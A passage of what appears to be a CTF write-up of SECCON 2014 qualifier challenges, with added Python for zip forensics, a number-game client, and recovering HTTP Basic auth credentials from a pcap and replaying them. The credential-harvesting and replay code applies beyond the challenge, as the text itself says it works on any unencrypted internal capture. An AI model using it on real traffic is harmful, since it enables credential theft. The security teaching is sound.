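                for info in archive.infolist():
                    if os.path.basename(info.filename) == target:
                        hits.append((path, archive.read(info)))
    return hits


def build_fixture(root: str) -> None:
    """Constructed stand-in for the mounted image: numbered zip files, most of
    them holding a keyNN.txt decoy, one of them holding key.txt, plus one plain
    file that merely mentions the name."""
    for number in range(1, 8):
        with zipfile.ZipFile(os.path.join(root, str(number)), "w") as archive:
            if number == 5:
                archive.writestr("key.txt", "SECCON{constructed_example_flag}")
            else:
                archive.writestr(f"key{number}{number}.txt", "not the flag")
    with open(os.path.join(root, "notes"), "wb") as plain:
        plain.write(b"key.txt is mentioned here but this is not an archive\n")


def run_demo():
    """Build the fixture in a temp dir, search it, return [(file name, member text)]."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return [(os.path.basename(path), data.decode())
                for path, data in find_member(root)]


if __name__ == "__main__":
    print("fake image is ext2:", looks_like_ext2(fake_ext2_image()))
    print(run_demo())
```

For the real image, mount it as in the write-up (mount -o loop forensic100 /mnt) and call find_member("/mnt"); the grep-style strings loop from the solution is what you fall back to when the numbered files turn out not to be archives.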
<h2 id="toc_4">
Choose the number</h2>
<ul>
<li>Challenge:
<ul>
<li>nc number.quals.seccon.jp 31337</li>
<li>After connecting, the server hands you a set of numbers and asks for the largest or the smallest. This repeats roughly twenty to thirty times, and the numbers keep getting larger.</li>
</ul>
</li>
<li>Approach:
<ul>
<li>Very straightforward: write a program that works out the answer and sends it back.</li>
</ul>
</li>
<li>Solution:
<ul>
<li><a href="http://pastebin.com/xaLf4L2C">number.py</a></li>
</ul>
</li>
</ul>
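An added example, not the number.py linked above: a client that parses each round, picks the requested extreme and sends it back. The server's exact wording is not reproduced in the post, so the prompt layout (a line that mentions largest or smallest, the candidates on a line of their own) is an assumption; host and port are the ones from the challenge. Candidates are compared as Python integers, which matters once the numbers grow past a fixed-width type, and is what a string comparison would get wrong.

```python
import re
import socket

HOST, PORT = "number.quals.seccon.jp", 31337   # from the challenge description

# Assumed prompt layout: one line saying whether the largest or the smallest value
# is wanted, and the candidates on a line (or lines) holding nothing but integers.
ASK_MAX_RE = re.compile(r"larg|bigg|max|high", re.IGNORECASE)
ASK_MIN_RE = re.compile(r"small|min|low", re.IGNORECASE)
NUMBER_LINE_RE = re.compile(r"^[\s\-\d,]+$")
INT_RE = re.compile(r"-?\d+")


def answer(prompt: str):
    """Return the requested extreme as a decimal string, or None while the prompt
    is still incomplete (no question yet, or no candidate line yet)."""
    want = None
    candidates = []
    for line in prompt.splitlines():
        if NUMBER_LINE_RE.match(line) and INT_RE.search(line):
            candidates.extend(int(n) for n in INT_RE.findall(line))
        elif ASK_MAX_RE.search(line):
            want = max
        elif ASK_MIN_RE.search(line):
            want = min
    if want is None or not candidates:
        return None
    # Python ints never overflow, so the growing values are fine; comparing the raw
    # tokens as strings would not be ("9" sorts after "10").
    return str(want(candidates))


def play(host: str = HOST, port: int = PORT) -> str:
    """Answer round after round until the server closes the connection, then
    return everything it sent (the flag is expected in there). Needs network."""
    transcript = []
    buf = ""
    with socket.create_connection((host, port), timeout=30) as sock:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            text = chunk.decode("utf-8", "replace")
            transcript.append(text)
            buf += text
            # If the trailing partial line looks numeric, a candidate may still be
            # arriving in the next recv(); do not answer from a truncated number.
            last = buf.rsplit("\n", 1)[-1]
            if last and NUMBER_LINE_RE.match(last):
                continue
            reply = answer(buf)
            if reply is not None:
                sock.sendall((reply + "\n").encode())
                buf = ""
    return "".join(transcript)


if __name__ == "__main__":
    print(play())
```

If the real prompt words the question differently, only the two keyword regexes need adjusting; the buffering and the integer comparison stay as they are.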
<h2 id="toc_5">
Get the key</h2>
<ul>
<li>Challenge:
<ul>
<li><a href="http://files.quals.seccon.jp/nw100.pcap">nw100.pcap</a></li>
</ul>
</li>
<li>Approach:
<ul>
<li>Analysing the capture, the source host keeps connecting to a <a href="http://133.242.224.21:6809/nw100/">web page</a> that asks for a password. Most of those requests come back 401, but one GET /nw100/ is answered 200 OK, and comparing it with the others shows one extra HTTP header:
<ul>
<li>Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=</li>
</ul>
</li>
<li>Sending the request again with that header added is enough to capture the flag. Basic authentication is only base64 of user:password, so the header value is the credential itself.</li>
</ul>
</li>
<li>Solution:
<ul>
<li>Add the Authorization header to the request</li>
<li>Fetch http://133.242.224.21:6809/nw100/</li>
</ul>
</li>
<li>Answer:
<ul>
<li>SECCON{Basic_NW_Challenge_Done!}</li>
</ul>
</li>
</ul>
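The credential recovery as an added example, not part of the post. The Authorization value is the only thing taken from the capture; the surrounding request and response lines are constructed to look like the reassembled HTTP stream. Decoding the header gives seccon2014:YourBattleField, and the replay helper rebuilds the same header the way curl -u would. The replay needs network access and is not exercised here.

```python
import base64
import re
from urllib.request import Request, urlopen

# Constructed stand-in for the reassembled HTTP stream from nw100.pcap: one
# rejected request and one accepted one. Only the Authorization value is real.
CAPTURED_STREAM = """GET /nw100/ HTTP/1.1
Host: 133.242.224.21:6809

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="nw100"

GET /nw100/ HTTP/1.1
Host: 133.242.224.21:6809
Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=

HTTP/1.1 200 OK
Content-Type: text/html
"""

BASIC_RE = re.compile(
    r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.MULTILINE | re.IGNORECASE
)


def basic_credentials(stream: str):
    """Return every (user, password) pair sent as HTTP Basic auth in the stream.

    Basic auth is base64(user ':' password). base64 is an encoding, not
    encryption, so a plaintext HTTP capture hands the credentials to anyone
    who can read it; this is the whole reason the pcap solves the challenge.
    """
    creds = []
    for token in BASIC_RE.findall(stream):
        decoded = base64.b64decode(token).decode("utf-8", "replace")
        user, _sep, password = decoded.partition(":")
        creds.append((user, password))
    return creds


def build_authorization(user: str, password: str) -> str:
    """Rebuild the header value from a credential pair (what curl -u does)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def fetch_with_basic_auth(url: str, user: str, password: str, timeout: int = 10) -> str:
    """Replay the request with the recovered header. Needs network; not run here."""
    req = Request(url, headers={"Authorization": build_authorization(user, password)})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    for user, password in basic_credentials(CAPTURED_STREAM):
        print(f"user={user!r} password={password!r}")
        print(build_authorization(user, password))
```

To reproduce the solution, feed the reassembled TCP stream (Wireshark's Follow TCP Stream output works) to basic_credentials and pass the pair to fetch_with_basic_auth with the nw100 URL. The same function run over any unencrypted capture of an internal network is a quick way to show why Basic auth over plain HTTP is a credential leak.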
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0